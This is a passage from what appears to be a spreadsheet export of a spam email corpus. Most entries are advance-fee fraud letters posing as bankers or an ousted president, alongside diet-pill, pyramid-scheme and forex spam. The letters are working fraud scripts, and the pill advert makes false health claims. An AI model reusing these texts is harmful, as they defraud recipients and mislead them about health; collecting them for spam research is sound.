occasions prior to any investments being placed, and however I\nencouraged him to consider various growth funds with prime ratings. The\nfavored route in my advice to customers is to start by assessing data on\n600 traditional stocks and bond managers and 200 managers of alternative\ninvestments. Based on my advice, we spun the money around various\nopportunities and made attractive margins for our first months of\noperation, the accrued profit with interest included, stood at this point\nat over 13.2 million United States Dollars, this margin was not the full\npotential of the fund but he desired low risk guaranteed returns on\ninvestments. In mid 2001, he asked that the money be liquidated because he\nneeded to make an urgent investment requiring cash payments in Europe. He\ndirected that I liquidate the funds and had it deposited with a firm in\nEurope.I informed him that our bank would have to make special\narrangements to have this done and in order not to circumvent due process,\nthe bank would have to make a 9.5 % deduction from the funds to cater for\nbanking and statutory charges. He complained about the charges but later\ncame around when I explained to him the complexities of the task he was\nasking of us. Cash movement across borders has become especially strict\nsince the incidents of 9/11.\n\nI contacted my affiliate in Europe and had the funds available in mainland\nEurope, I undertook all the processes and made sure I followed his precise\ninstructions to the letter and had the funds deposited in a security\nconsultancy firm, the firm is a specialist private firm that accepts\ndeposits from high net worth individuals and blue chip corporations that\nhandle valuable products or undertake transactions that need immediate\naccess to cash. This small and highly private organization is familiar\nespecially to the highly placed and well-connected organizations. In line\nwith instructions, the money was deposited; he told me he wanted the money\nthere in anticipation of his arrival from Norway later that week. This was\nthe last communication we had, this transpired around February 25th 2002.\nIn June last year, we got a call from the security firm informing us of\nthe inactivity of that particular portfolio. This was an astounding\nposition as far as I was concerned, given the fact that I managed the\nprivate banking sector I was the only one who knew about the deposit, and\nI could not understand why he had not come forward to claim his deposit.I\nmade futile efforts to locate him I immediately passed the task of\nlocating him to the internal investigations department of our bank. Four\ndays later, information started to trickle in, that he was apparently\ndead, a person who suited his description was declared dead of a heart\nattack in Cannes, South of France; we were soon enough able to gather more\ninformation and the cause of death was confirmed. The bank immediately\nlaunched an investigation into possible surviving next of kin to alert\nabout the situation and also to come forward to claim his estate. If you\nare familiar with private banking affairs, those who patronize our\nservices usually prefer anonymity, but also some levels of detachment from\nconventional processes. In his bio-data form, he listed no next of kin. In\nthe field of private banking, opening an account with us means no one will\nknow of its existence, accounts are rarely held under a name; depositors\nuse numbers and codes to make the accounts anonymous. This bank also gives\nthe choice to depositors of having their mail sent to them or held at the\nbank itself, ensuring that there are no traces of the account and as I\nsaid, rarely do they nominate next of kin. Private banking clients apart\nfrom not nominating next of kin also usually in most cases leave wills in\nour care, in this case; he died in testate.\n\nIn line with our internal processes for account holders who have passed\naway, we instituted our own investigations in good faith to determine who\nshould have right to claim the estate, this investigation for several\nmonths were futile. We have scanned every continent and used our private\ninvestigation affiliate companies to get to the root of the problem. It is\nthis investigation that resulted in my decision to obtain your contact\ndetails and contact you, being as a foreigner or rather non-Asian, as a\npotential benefactor of the estate even if you are in no way affiliated\nwith this individual (the deceased).My official capacity dictates that I\nam the only party to supervise the investigation and the only party to\nreceive the results of the investigation. What this means, with you being\na foreigner, I have considered the fact that our dear late fellow died\nwith no known or identifiable family member.\n\nThis leaves me as the only person with the full picture of what the\nprevailing situation is in relation to the deposit and the late\nbeneficiary of the deposit. According to practice, the firm will by the\nend of this financial year broadcast a request for statements of claim to\nour bank, failing to receive viable claims they will most probably revert\nthe deposit back to our bank. This will result in the money entering our\nbank's accounting system and the portfolio will be out of my hands and out\nof the Private Banking Services Department. This will not happen if I have\nmy way.\n\nWhat I wish to relate to you might be a smack of unethical practice but I\nwant you to understand something; it is only an outsider to the banking\nworld who finds the internal politics of the banking world aberrational.\nThe world of private banking especially is fraught with huge rewards for\nthose who occupy certain offices and oversee certain portfolios; you\nshould have begun by now to put together the general direction of what I\npropose. There is USD$ 11,991,674 deposited, I alone have the deposit\ndetails and they will release the deposit to no one unless I instruct them\nto do so.I alone know of the existence of this deposit for as far as the\nfinance firm is concerned, the transaction with our deceased customer\nconcluded when I sent the funds to the firm, all outstanding interactions\nin relation to the file are just customer services and due process. The\nfinance firm has no single idea of what's the history or nature of the\ndeposit, they are simply awaiting instructions to release the deposit to\nany party that comes forward, and this is the situation.\n\nThis bank has spent great amounts of money trying to track the family of\nthe deceased; they have investigated for months and have found no family\nbut however the investigation has come to an end. My proposal; I am\nprepared to place you in a position to instruct the finance firm to\nrelease the deposit to you as the closest surviving relation. Upon receipt\nof the deposit, I am prepared to share the money with you in half and no\nmore; that is: I will simply nominate you as the next of kin and have them\nrelease the deposit to you; afterwards we share the proceeds 50/50.I would\nhave gone ahead to ask the funds be released to me, but that would have\ndrawn a straight line to me and my involvement in claiming the deposit,\nbut on the other hand, you as a indifferent foreigner would easily pass as\nthe beneficiary with the rights to claim, I assure you that I could have\nthe deposit released to you in a few days. I will simply inform our bank\nof the final closing of the file relating to the customer, I will then\nofficially communicate with the finance company and instruct them to\nrelease the deposit to you; with these two things: all is done. The\nalternative would be for us to have the firm direct the funds to another\nbank with you as account holder, this way there will be no need for you to\nthink of receiving the money from the firm.\n\nWe can fine-tune this based on our interactions, I am aware of the\nconsequences of this proposal and I ask that if you find no interest in\nthis project that you should discard this mail. I ask also, that you do\nnot be vindictive or destructive, if my offer is of no appeal to you,\ndelete this message and forget I ever contacted you; please not destroy my\ncareer because you do not approve of my proposal. You may not know this\nbut people like me who have made tidy sums out of comparable situations\nrun the whole private banking sector, I am not a criminal and what I do, I\ndo not find against good conscience, this may be hard for you to\nunderstand, but the dynamics of my industry dictates that I make this\nmove. Such opportunities only come ones' way once in a lifetime. I cannot\nlet this chance pass me by and I hope you understand, because for once I\nfound myself in total control and face to face with my destiny.\n\nThese chances won't pass me by, I ask that you do not destroy my chance,\nif you will not work with me please let me know, and hence move on with my\nlife, but do not destroy me; I am a family man and this is an occasion to\nprovide them with new opportunities. There is a reward for this project\nand it is a task well worth undertaking, I have evaluated the risks and\nthe only risk I have here is from you refusing to work with me and\nalerting my bank; I am the only one who knows of this situation, good\nfortune will bless you and plant you into the center of relevance in my\nlife, lets share the blessing.\n\nIf you find yourself interested to work with me, please contact me\nspecifically, through this email account (wang6qin@yahoo.com.hk), if you\ngive me positive signals, I will initiate this process towards a\nconclusion. It is necessary to inform you that under no condition should\nyou contact me via official channels; I will simply deny knowing you and\nabout this project. I repeat, I do not want you contacting me through our\nofficial lines neither do I want you contacting me through my official\nemail account. Contact me only through this email address above; I do not\nwant any direct link between you and me.My official lines are not secure\nlines as they are periodically monitored to assess our level of customer\ncare in line with our Total Quality Management policy, please observe this\ninstruction religiously.\n\nPlease, again, note I am a family man; I happily married with two kids, I\nsend you this mail not without a measure of fear as to what the\nconsequences might be, but I know within me that nothing ventured is\nnothing gained and that success and riches never come easy or on a platter\nof gold, this is the one truth I have learned from my private banking\nclients; do not betray my confidence. If we can be of one accord, I shall\nhave the pleasure of meeting you after this task has been completed plan a\nmeeting, soon.\n\nI await your response.\n\nYours Sincerely,\n\nQin.\n\n\n</t>
  </si>
  <si>
    <t>http://www.lloydstsb.com.hk</t>
  </si>
  <si>
    <t>831</t>
  </si>
  <si>
    <t>To: nan\nFrom: Charles Taylor &lt;charlestayloraap@iqsecure.com&gt;\nDate: Thu, 29 Jul 2004 01:30:39 -0700</t>
  </si>
  <si>
    <t>Thu, 29 Jul 2004 01:30:39 -0700</t>
  </si>
  <si>
    <t>Charles Taylor &lt;charlestayloraap@iqsecure.com&gt;</t>
  </si>
  <si>
    <t>Confidential letter from charles taylor /Response</t>
  </si>
  <si>
    <t>\nCONFIDENTIAL LETTER\n\nDEAR SIR/MADAM\n\nMY NAME IS CHARLES -TAYLOR. I AM THE FORMER PRESIDENT OF LIBERIA.\nI WAS FORCED TO RESIGN AS THE PRESIDENT OF LIBERIA IN WEST- AFRICA\n\nBY\nTHE UNITED NATIONS / INTERNATIONAL COMMUNITIES WHICH WAS\n\nSPEARHEADED BY\nTHE AMERICAN PRESIDENT, MR. GEORGE - BUSH.\n\nPRESENTLY I AM IN EXILE IN CALABAR - NIGERIA WHERE I AM STAYING\n\nUNDER\nCLOSE WATCH BY THE NIGERIAN GOVERNMENT WHO KINDLY OFFERED ME\n\nASYLUM.\n\nI NEED TO TRANSFER WHAT I CALL, MY FUTURE HOPE, THE SUM OF FIFTY\n\nTWO\nMILLION DOLLARS [USD 52,000,000,00] WHICH IS WITH A\n\nSECURITY/FINANCE\nCOMPANY INTO YOUR ACCOUNT OR ANY THAT YOU CAN GET FOR ME.\n\nI AM BEING MONITORED AND MY COMMUNICATION AND MOVEMENTS ARE UNDER\nSTRICT SURVEILLANCE .\nTHEREFORE I WILL REFER YOU TO  MY ATTORNEY,\n(BARRISTER A.B MAHMOUD,SAN ) MY LAWYER WHO IS ALSO MY CLOSE\n\nCONFIDANT\nWOULD BE ALBE TO ESTABLISH AN INVESTMENT WITH YOUR ASSISTANCE ON MY\nBEHALF UNTIL I COME OUT OF MY TRAVAIL AND TORMENTORS.YOU CAN GO\n\nTHROUGH\nTHIS WEBSITE TO SEE MY REAL DETAILS:\n\n[URL]http://www.pbs.org[/URL]\n\nTHIS IS TO ENSURE MAXIMUM CONFIDENTIALITY AND SECRECY. PLEASE I AM\nPROMISING TO SHARE THE FUNDS 50/50 IF YOU CAN QUITELY GET THIS FUND\n\nOUT\nINTO YOUR ACCOUNT.\n\nI WAIT PATIENTLY FOR YOUR RESPONSE.\n\nYOURS TRULY.\n\nCHARLES TAYLOR.\n\nEX- PRESIDENT OF LIBERIA\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.pbs.org</t>
  </si>
  <si>
    <t>573</t>
  </si>
  <si>
    <t>To: larryacb@voila.fr\nFrom: larryacb &lt;larryacb@voila.fr&gt;\nDate: Thu, 29 Jan 2004 00:35:48 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Jan 2004 00:35:48 +0100</t>
  </si>
  <si>
    <t>larryacb &lt;larryacb@voila.fr&gt;</t>
  </si>
  <si>
    <t>larryacb@voila.fr</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.LARRY WILLIAMS . AFRICAN CONTINENTAL BANK PLC(ACB) LAGOS-NIGERIA.\n\nDEAR SIR,\n\nSTRICTLY A PRIVATE BUSINESS PROPOSAL I AM MR.LARRY WILLIAMS, THE MANAGER, BILLS AND EXCHANGE AT THE FOREIGN REMITTANCE DEPARTMENT OF THE AFRICAN CONTINENTAL BANK PLC.\n\nI AM WRITING THIS LETTER TO ASK FOR YOUR SUPPORT AND COOPERATION TO CARRY OUT THIS BUSINESS OPPORTUNITY IN MY DEPARTMENT. WE DISCOVERED AN ABANDONED SUM OF $15.500,000.00 (FIFTEEN MILLION FIVE HUNDRED UNITED STATES DOLLARS ONLY) IN AN ACCOUNT THAT BELONGS TO ONE OF OUR FOREIGN CUSTOMERS LATE ENGR,BRIAN LLOYD SMITH, WHO DIED WITH HIS ENTIRE FAMILY OF A WIFE AND TWO CHILDREN IN ADC AIR LINE BOEING 722,THAT CRASHED ON NOVEMBER 1996 WHILE TRAVELLING FROM LAGOS TO PORT HARCOUT.\n\nSINCE WE HEARD OF HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT-OF-KIN TO COME OVER AND PUT CLAIMS FOR HIS MONEY AS THE HEIR,BECAUSE THE BANK CANNOT RELEASE THE FUND FROM HIS ACCOUNT UNLESS SOMEONE APPLIES FOR CLAIM AS THE NEXT-OF-KIN TO THE DECEASED AS INDICATED IN OUR BANKING GUIDELINES. UNFORTUNATELY, NEITHER THEIR FAMILY MEMBER NOR DISTANT RELATIVE HAS EVER APPEARED TO CLAIM THE SAID FUND.\n\nUPON THIS DISCOVERY,I AND OTHER OFFICIALS IN MY DEPARTMENT HAVE AGREED TO MAKE BUSINESS WITH YOU AND RELEASE THE TOTAL AMOUNT INTO YOUR ACCOUNT AS THE HEIR OF THE FUND SINCE NO ONE CAME FOR IT OR DISCOVERED HIS MAINTAINED ACCOUNT WITH OUR BANK, OTHERWISE THE FUND WILL BE RETURNED TO THE BANKS TREASURY AS UNCLAIMED FUND. WE HAVE AGREED THAT OUR RATIO OF SHARING WILL BE AS STATED THUS; 30 % FOR YOU AS FOREIGN PARTNER, 60 % FOR US THE OFFICIALS IN MY DEPARTMENT AND 10% FOR THE SETTLEMENT OF ALL LOCAL AND FOREIGN EXPENCES INCURRED BY US AND YOU DURING THE COURSE OF THIS BUSINESS.\n\nUPON THE SUCCESSFUL COMPLETION OF THIS TRANSFER, I AND ONE OF MY COLLEAGUES WILL COME TO YOUR COUNTRY AND MIND OUR SHARE. IT IS FROM OUR 60 % WE INTEND TO INVEST IN YOUR COUNTRY AS A WAY OF RECYCLING THE FUND. TO COMMENCE THIS TRANSACTION, WE REQUIRE YOU TO IMMEDIATELY INDICATE YOUR INTEREST BY A RETURN E-MAIL AND ENCLOSE YOUR PRIVATE CONTACT TELEPHONE NUMBER, FAX NUMBER FULL NAME AND ADDRESS TO ENABLE ME FILE LETTER OF CLAIM TO THE APPROPRIATE DEPARTMENTS FOR NECESSARY APPROVALS BEFORE THE TRANSFER CAN BE MADE. NOTE ALSO, THIS TRANSACTION MUST BE KEPT STRICTLY CONFIDENTIAL BECAUSE OF IT'S NATURE. I LOOK FORWARD TO RECEIVING YOUR PROMPT RESPONSE.\n\nREGARDS,\n\nMR. LARRY WILLIAMS\nAFRICAN CONTINENTAL BANK PLC(ACB)\nEmail:acb23larry@yahoo.dk\n\n------------------------------------------\n\nFaites un voeu et puis Voila ! [URL]www.voila.fr[/URL] \n\n\n</t>
  </si>
  <si>
    <t>www.voila.fr</t>
  </si>
  <si>
    <t>4243</t>
  </si>
  <si>
    <t>To: gnvb@hotmail.com\nFrom: fred@bluemail.dk\nDate: Thu, 29 Aug 2002 22:32:54 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 22:32:54 +0100</t>
  </si>
  <si>
    <t>fred@bluemail.dk</t>
  </si>
  <si>
    <t>gnvb@hotmail.com</t>
  </si>
  <si>
    <t>FORTUNE 500 COMPANY HIRING, AT HOME REPS.</t>
  </si>
  <si>
    <t>Help wanted.  We are a 14 year old fortune 500 company, that is\ngrowing at a tremendous rate.  We are looking for individuals who\nwant to work from home.\n\nThis is an opportunity to make an excellent income.  No experience\nis required.  We will train you.\n\nSo if you are looking to be employed from home with a career that has\nvast opportunities, then go:\n\n[URL]http://www.basetel.com[/URL]\n\nWe are looking for energetic and self motivated people.  If that is you\nthan click on the link and fill out the form, and one of our\nemployement specialist will contact you.\n\nTo be removed from our link simple go to:\n\n[URL]http://www.basetel.com[/URL]</t>
  </si>
  <si>
    <t>4248</t>
  </si>
  <si>
    <t>To: &lt;leftout@cac.net&gt;, &lt;jphillips@royal.net&gt;, &lt;house@cablelan.net&gt;,\nFrom: lworks1@hotmail.com\nDate: Thu, 29 Aug 2002 19:56:38 -1600</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 19:56:38 -1600</t>
  </si>
  <si>
    <t>lworks1@hotmail.com</t>
  </si>
  <si>
    <t>&lt;leftout@cac.net&gt;, &lt;jphillips@royal.net&gt;, &lt;house@cablelan.net&gt;,</t>
  </si>
  <si>
    <t>Attn: How about being a few pounds lighter?OLIBYKN</t>
  </si>
  <si>
    <t>How are you doing?\n\nIf you've been like me, you've been trying almost\nEVERYTHING to lose weight. I know how you feel\n- the special diets, miracle pills, and fancy exercise \nequipment never helped me lose the pounds I needed to lose\neither. It seemed like the harder I worked at it, the less\nweight I lost - until I heard about 'Extreme Power Plus'.\n\nYou're probably thinking to yourself, "Oh geez, not another\nmiracle diet pill!" Like you, I was skeptical at first, but \nmy sister said it helped her lose 23 pounds in just 2 weeks, \nso I told her I'd give it a try. I mean, there was nothing \nto lose except a lot of weight! Let me tell you, it was\nthe best decision I've ever made.  PERIOD.  Six months later,\nas I'm writing this message to you, I've gone from 355 pounds\nto 210 pounds, and I haven't changed my exercise routine or diet\nat all. Yes, I still eat pizza, and lots of it!\n\nI was so happy with the results that I contacted the manufacturer\nand received permission to resell it - at a HUGE discount.I feel\nthe need to help other people lose weight like I did, because it\ndoes so much for your self-esteem, not to mention your health.\nI am giving you my personal pledge that 'Extreme Power Plus'\nabsolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!\n\nIf you are frustrated with trying other products, without having \nany success, and just not getting the results you were promised,\nthen I recommend the only product that worked for me - \n'EXTREME POWER PLUS'!\n\nYou're probably asking yourself, "Ok, so how does this stuff\nactually work?"\n\nExtreme Power Plus contains Lipotropic fat burners and ephedra which \nis scientifically proven to increase metabolism and cause rapid \nweight loss. No "hocus pocus" in these pills - just RESULTS!!! \n\nHere is the bottom line ...\n\nI can help you lose 10-15 pounds per week naturally, without\nexercising and without having to eat rice cakes all day. \nJust try it for one month - there's pounds to lose and confidence \nto gain! You will lose weight fast - GUARANTEED. This is my\npledge to you.\n\nBONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more! \n\nTo order Extreme Power Plus on our secure server, just click\non this link -&gt; [URL]http://www.modernherbals.com[/URL]\n\nTo see what some of our customers have said about this product, \nvisit [URL]http://www.modernherbals.com[/URL]\n\nTo see a list of ingredients and for more information\non test studies and how it will help you lose weight, visit \n[URL]http://www.modernherbals.com[/URL]\n\n*****************************************************************\nIf you feel that you have received this email in error, please \nclick here -&gt; [URL]http://www.moderherbals.com[/URL]  to request\nto be removed. Thank you, and we apologize for any inconvenience.\n*****************************************************************</t>
  </si>
  <si>
    <t>http://www.modernherbals.com http://www.modernherbals.com http://www.modernherbals.com http://www.moderherbals.com</t>
  </si>
  <si>
    <t>4260</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - TBA" &lt;tba@insiq.us&gt;\nDate: Thu, 29 Aug 2002 18:53:43 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 18:53:43 -0400</t>
  </si>
  <si>
    <t>The TBA Doctor Walks the Walk on Diabetes</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_C7177_01C24F78.AFE25230 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  The TBA Doctor Walks the Walk... On Diabetes!  =20  =20 Case 1:	 Case 2:	=20 ? Male age 37 ? Nonsmoker=20 ? $500,000 Face ? Type 1 Diabetic - Treated with Insulin Pump ? Diagnosed at age 23 ? Hospitalized in '95, '96 and '98 with   "Diabetic Complications" ? Issued Standard 	? Male age 51 ? Nonsmoker=20 ? $1,200,000 Face ? 6'0", 237lbs=20 ? Takes Micronase and Glucophage ? Issued Super Standard =09 Case 3:	 Case 4:	=20 ? Female age 60 ? Nonsmoker=20 ? $2,000,000 Face ? 5'5", 165lbs=20 ? Insulin Dependent=20 ? Issued Super Standard 	? Male age 45 ? Nonsmoker=20 ? $875,000 Face ? 6'4", 275lbs ? Diabetes Controlled by Diet ? Issued Super Standard =09 Click here to provide the details on your "tough case"  	=20 Call the Doctor with your case details! We've cured 1,000s of agents' "tough cases!"  800-624-4502 ext. 18=09 =97 or =97 Please fill out the form below for more information	=20 Name:	 	  =09 E-mail:	 	=20 Phone:	 	=20 City:	 	 State:	 	=20  	    =09 =20 Tennessee Brokerage Agency - [URL]www.TBA.com[/URL]  =20 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceIQ.com[/URL] Legal Notice  =20 ------=_NextPart_000_C7177_01C24F78.AFE25230 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable The TBA Doctor Walks the Walk on Diabetes =20      =20        =20            =20              =20                 Case 1: Case 2: =20                 • Male age = 37                   • Nonsmoker                    • $500,000 Face                   • Type 1 Diabetic - Treated with Insulin = Pump                   • Diagnosed at age 23                   • Hospitalized in '95, '96 and '98 with                     "Diabetic Complications"                   • Issued = Standard • Male age 51                   • Nonsmoker                    • $1,200,000 Face                   • 6'0", 237lbs                    • Takes Micronase and Glucophage                   • Issued Super = Standard =20                 Case = 3: Case = 4: =20                 • Female = age 60                   • Nonsmoker                    • $2,000,000 Face                   • 5'5", 165lbs                    • Insulin Dependent                    • Issued Super = Standard • Male age = 45                   • Nonsmoker                    • $875,000 Face                   • 6'4", 275lbs                   • Diabetes Controlled by Diet                   • Issued Super = Standard =20            =20           =20             Call the Doctor with = your case details! We've cured 1,000s of agents' = "tough cases!" — or = — =20 								 =20 										 =20                         Please fill = out the form below for more information =20                         Name:   =20                         E-mail:   =20                         Phone:   =20                         City:   State:   =20                           =20                            =20                          =20            =20      =20         We don't want anyone to receive our mailings who does not wish = to. This=20         is professional communication sent to insurance professionals. = To be removed=20         from this mailing list, DO NOT REPLY to this message. = Instead,=20         go here: [URL]http://www.InsuranceIQ.com[/URL] out Legal Notice=20 =20 ------=_NextPart_000_C7177_01C24F78.AFE25230--</t>
  </si>
  <si>
    <t>www.TBA.com http://www.InsuranceIQ.com http://www.InsuranceIQ.com</t>
  </si>
  <si>
    <t>4231</t>
  </si>
  <si>
    <t>To: Joker@webnote.net\nFrom: UK PRANK CALLS &lt;ebdhfghdfg45@excite.com&gt;\nDate: Thu, 29 Aug 2002 10:00:10 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 10:00:10 +0100</t>
  </si>
  <si>
    <t>UK PRANK CALLS &lt;ebdhfghdfg45@excite.com&gt;</t>
  </si>
  <si>
    <t>Joker@webnote.net</t>
  </si>
  <si>
    <t>Play a Hilarious Phone Prank</t>
  </si>
  <si>
    <t>Wind up your mates today! Please visit [URL]http://ukprankcalls.com[/URL]</t>
  </si>
  <si>
    <t>4234</t>
  </si>
  <si>
    <t>To: &lt;O961@mail.x-stream.co.uk&gt;\nFrom: "Maryln" &lt;Kristian2025161@lancsmail.com&gt;\nDate: Thu, 29 Aug 2002 08:45:22 -1600</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 08:45:22 -1600</t>
  </si>
  <si>
    <t>"Maryln" &lt;Kristian2025161@lancsmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;O961@mail.x-stream.co.uk&gt;</t>
  </si>
  <si>
    <t>Get your OWN piece of history.</t>
  </si>
  <si>
    <t>On January 1st 2002, the European countries began\nusing the new Euro.  Never before have so\nmany countries with such powerful economies united\nto use a single currency.  Get your piece of history\nnow!  We would like to send you a FREE Euro\nand a FREE report on world currency.  Just visit\nour site to request your Euro and Euro report:\n\n[URL]http://vicky.mothost.com[/URL]\n\nIn addition to our currency report, you can receive\nour FREE INVESTMENT PACKAGE:\n\n*  Learn how $10,000 in options will leverage $1,000,000 in\nEuro Currency. This means even a small movement in the market\nhas huge profit potential.\n\nIf you are over age 18 and have some risk capital, it's\nimportant that you find out how the Euro will\nchange the economic world and how you can profit!\n\n[URL]http://vicky.mothost.com[/URL]\n\n$10,000 minimum investment\n\nPlease carefully evaluate your financial position before\ntrading.  Only risk capital should be used.\n\n[URL]http://vicky.mothost.com[/URL] To OptOut.</t>
  </si>
  <si>
    <t>http://vicky.mothost.com http://vicky.mothost.com http://vicky.mothost.com</t>
  </si>
  <si>
    <t>4233</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: "Opt-inList" &lt;besthomebiz@subdimension.com&gt;\nDate: Thu, 29 Aug 2002 06:25:48 -0500</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 06:25:48 -0500</t>
  </si>
  <si>
    <t>"Opt-inList" &lt;besthomebiz@subdimension.com&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] Everybody Gets Paid - No Recruiting Needed</t>
  </si>
  <si>
    <t>Everybody gets paid.  No recruiting required. Join and reserve a position for free now. Program is 18 weeks old and it's paying. Everybody gets in line to get paid by all the new people coming in (but it's NOT a traditional straightline)...EVERYONE makes money... and those that sponsor make more.... Click here to request for more information We belong to the same opt-in list. But if wish to have your email address REMOVE from our database please click here --  Irish Linux Users' Group Social Events: social@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>2550</t>
  </si>
  <si>
    <t>To: nan\nFrom: Dr.Mark Chuks &lt;drmarkw68@hotmail.com&gt;\nDate: Thu, 28 Sep 2006 19:13:18 +0200</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2006 19:13:18 +0200</t>
  </si>
  <si>
    <t>Dr.Mark Chuks &lt;drmarkw68@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Business..</t>
  </si>
  <si>
    <t>Box 1287 Port Shepstone\nChaka -South Africa.\n\n\n\n{URGENT AND CONFIDENTIAL}\nRE: TRANSFER OF ($ 126,000.000.00 USD}\n{ONE HUNDRED AND TWENTY SIX MILLION DOLLARS)\n*******************************************\n\nDear Sir/Madam,\n\nWe want to transfer to overseas ($ 126,000.000.00 USD)\nOne hundred and Twenty six million United States\nDollars) from a Bank in Africa, You can serve to\nreceive this money, as long as you will remain honest\nto me till the end for this important business\ntrusting in you and believing in God that you will\nnever let me down either now or in future.\n\nI am Dr.Mark Chuks, the Auditor General of a bank in\nAfrica, during the course of our auditing I discovered\na floating fund in an account opened in the bank in\n1995 and since 1998 nobody has operated on this\naccount again, after going through some old files in\nthe records I discovered that the owner of the account\ndied without a [heir] hence the money is floating and\nif I do not remit this money out urgently it will be\nforfeited for nothing. the owner of this account is\nMr. Frankline Sullivan, a foreigner, and a sailor, and\nhe died, since 1998. and no other person knows about\nthis account or any thing concerning it, the account\nhas no other beneficiary and my investigation proved\nto me as well that Frankline Sullivan until his death\nwas the manager Sulliv Coy.(pty). SA.\n\nWe will start the first transfer with Twenty six\nmillion [$26,000.000] upon successful transaction\nwithout any disappoint from your side, we shall\nre-apply for the payment of the remaining rest amount\nto your account.\n\nThe amount involved is (USD 126M) One hundred and\nTwenty Six million United States Dollars, only I want\nto first transfer $26,000.000 [Twenty Six million\nUnited States Dollar from this money into a safe\nforeigners account abroad before the rest, but I don't\nknow any foreigner, I am only contacting you as a\nforeigner because this money can not be approved to a\nlocal person here, without valid international foreign\npassport, but can only be approved to any foreigner\nwith valid international passport or drivers license\nand foreign a/c because the money is in us dollars and\nthe former owner of the a/c Mr. Frankline Sullivan is\na foreigner too, [and the money can only be approved\ninto a foreign a/c.\n\nHowever, we will sign a binding agreement, to bind us\ntogether I got your contact address from my secretary\nwho operates computer, I am revealing this to you with\nbelieve in God that you will never let me down in this\nbusiness, So please reply urgently so that I will\ninform you the next step to take urgently. Send also\nyour private telephone and fax number including the\nfull details of the account to be used for the\ndeposit.\n\nI want us to meet face to face to build confidence and\nto sign a binding agreement that will bind us together\nbefore transferring the money to any account of your\nchoice where the fund will be safe. Before we fly to\nyour country for withdrawal, sharing and investments.\n\nI need your full co-operation to make this work fine.\nbecause the management is ready to approve this\npayment to any foreigner who has correct information\nof this account, which I will give to you, upon your\npositive response and once I am convinced that you are\ncapable and will meet up with instruction of a key\nbank official who is deeply involved with me in this\nbusiness.\n\nI need your strong assurance that you will never,\nnever let me down.\n\nWith my influence and the position of the bank\nofficial we can transfer this money to any foreigner's\nreliable account which you can provide with assurance\nthat this money will be intact pending our physical\narrival in your country for sharing. The bank official\nwill destroy all documents of transaction immediately\nwe receive this money leaving no trace to any place\nand to build confidence you can come immediately to\ndiscuss with me face to face after which I will make\nthis remittance in your presence and three of us\nwillfly to your country at least two days ahead of the\nmoney going into the account.\n\nI will apply for annual leave to get visa immediately\nI hear from you that you are ready to act and receive\nthis fund in your account. I will use my position and\ninfluence to obtain all legal approvals for onward\ntransfer of this money to your account with\nappropriate clearance from the relevant ministries\nand foreign exchange departments.\n\nAt the conclusion of this business, you will be given\n35% of the total amount, 60% will be for me, while 5%\nwill be for exp�enses both parties might have incurred\nduring the process of transferring.\n\nI look forward to hear from you.\n\nBest Regard,\n\nDr.Mark Chuks.\n\n_________________________________________________________________\nGet the ultimate real-time chat experience - Windows Live Messenger! \n[URL]http://messenger.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2548</t>
  </si>
  <si>
    <t>To: e.morgan5@pobox.sk\nFrom: eric morgan &lt;e.morgan5@pobox.sk&gt;\nDate: Thu, 28 Sep 2006 11:59:08 +0200</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2006 11:59:08 +0200</t>
  </si>
  <si>
    <t>eric morgan &lt;e.morgan5@pobox.sk&gt;</t>
  </si>
  <si>
    <t>e.morgan5@pobox.sk</t>
  </si>
  <si>
    <t>READ AND GET BACK TO ME</t>
  </si>
  <si>
    <t xml:space="preserve">\nDr.Eric Morgan                                                         \nBranch Supervisor, \nBanque International De L’Afrique De L’Ouest (BIAO-CI), \nAbidjan,Cote D’Ivoire, \nEMAIL:eric.morgan001@yahoo.co.uk\n\nDearest Beloved, \nThis mail may be a surprise because you did not give me the permission to do reach you and neither do you know me in person. Before introducing myself, I want you to please forgive me for sending this mail without your Consent . \nDearest beloved I came to know you through my search for a reliable, transparent and trustworthy person or partner to assist me execute a vital private and confidential business transaction as stated b elow, therefore I am very glad Ih ave found a personlike you. \nI am Dr.Eric Morgan an account officer with Banque Internationale de L' afrique De L' Ouest Cote D' Ivoire. I am writing following an opportunity in my department here in the bank that will be of immense benefit both of us. \nIn my department we discovered an abandoned sum of $10 million Ten million united states dollars) in an account that belongs to one of our foreign customer the Late Mr Smith B.Andrea an American oil engineer with Petro Technical Services Sarl who unfortunately lost his life in the plane crash of Alaska Airlines Flight 261 which crashed on January 31 2000, including his wife. \nYou read more on the crash on visiting this Site.[URL]http://www.cnn.com[/URL] airlines.list/smith.html. \nSince we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because we cannot release it unless somebody applies for it as next of kin or relatio n to the deceased as indicated in our bankingguidelines. \nUnfortunately I learnt that his supposed next of kin being his wife [Patty Andrea] died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. \nIt is therefore upon this discovery that I now decided to make business with you and release the money to you as the next of kin or beneficiary of the funds for safety keeping and 